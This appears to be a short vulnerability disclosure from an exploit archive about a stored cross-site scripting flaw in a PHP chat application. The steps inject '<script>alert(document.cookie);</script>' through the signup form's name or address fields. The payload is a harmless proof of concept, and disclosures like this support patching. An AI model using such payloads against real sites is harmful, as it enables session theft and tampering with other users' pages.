Chatting System PHP Ajax MySQL JavaScript 1.0 Cross Site Scripting

Chatting System PHP Ajax MySQL JavaScript version 1.0 suffers from a cross site scripting vulnerability.


MD5 | 8080ac0081699a839acf51f994db6389

# Exploit Title: Chatting System PHP Ajax MySQL JavaScript - xss
# Google Dork: N/A
# Date: 2017/31/12
# Exploit Author: ShanoWeb
# Author Mail : Mr[dot]Net2Net[at]Gmail[dot]com
# Vendor Homepage: https://www.codester.com/IngeniousDeveloper
# Software Buy: https://www.codester.com/items/5477/chatting-system-php-ajax-mysql-javascript
# Demo: http://chat.yourphpscript.com/view/login.php
# Version: 1.0
# Tested on: Win7 x64, Kali Linux x64
# Exploit :

Hi 2 All
1. go to http:[site]/view/login.php
2. Click to New User
3. insert to textbox "Full Name" Or "Address" -> <script>alert(document.cookie);</script> or <script>alert(/ShanoWeb/);</script>
4. insert other textbox...
5. click to Sing Up
6. Login to your page .


:D

./
|=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-|
| Find and patch bug in your website and system|
| Contact : Mr[dot]Net2Net[at]Gmail[dot]com |
|=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-|

|=============================================================|
/-------------------------------------------------------------\
| My Message To |
\-------------------------------------------------------------/
|= [!] Make Love,Not War!. Peace No War!
|= [!] We Are One!
|= [!] We are Legion,We do not Forgive,We Do not Forge
|= [!] We Love All Children from Palestine
|=============================================================|

Related Posts